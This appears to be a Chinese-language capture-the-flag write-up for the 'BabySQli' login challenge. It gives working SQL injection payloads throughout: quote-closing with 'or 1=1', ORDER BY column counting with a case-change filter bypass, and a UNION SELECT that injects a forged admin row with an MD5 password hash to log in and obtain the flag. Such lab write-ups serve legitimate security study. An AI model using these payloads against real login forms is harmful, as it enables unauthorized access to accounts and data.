BabySQli

拿到一个登录框

随便填些信息登录一下

这里用户名不是admin的话会提示用户名错误，其他都提示密码错误，看来admin就是正确用户名
可以看到返回页面有注释MMZFM422K5HDASKDN5TVU3SKOZRFGQRRMMZFM6KJJBSG6WSYJJWESSCWPJNFQSTVLFLTC3CJIQYGOSTZKJ2VSVZRNRFHOPJ5
这串字符不区分大小写，只有[A-z2-7]，看来是base32

这很显然是base64

解码出来了一段sql语句：select * from user where username = '$name'
可以看到查询语句中的$name被单引号闭合了，尝试用单引号闭合name=admin' or 1=1 -- qwe&pw=123

查字段：name=admin' order by 2 -- qwe&pw=123

存在绕过，换大写试试：name=admin' ORDER BY 4 -- qwe&pw=123

最后查出来三个字段
判断用户名所在字段：name=1' UNION SELECT 'admin',2,3 -- qwe&pw=asd

no user，把用户名放到第二位查询：name=1' UNION SELECT 1,'admin',3 -- qwe&pw=asd

看来用户名被存在第二个字段，无法查出数据，可能后端是利用两个if语句来验证用户名密码的

构造payload

我们不知道admin的密码，这时可以随便写，当联合查询不存在的数据时，只要字段一致，数据库会将该数据与原数据合起来输出

我们可以看到，数据库不光显示了我联合查询的数据，也显示了使where成立的数据
一般密码是使用哈希算法计算后存储在数据库中的，那么我们也可以将asd进行哈希加密（asd是随便写的）

先试试MD5：7815696ecbf1c96e6894b779456d330e
这里的第三位要与后面密码位保持一致：name=1' UNION SELECT 1,'admin','7815696ecbf1c96e6894b779456d330e' -- qwe&pw=asd

得到：flag{b13f4d63-8b0e-47ef-aee6-a6c31fe6f091}

总结

这道题可能也不是很难，但确实有爽到我
又一次体会到了拿到flag的乐趣！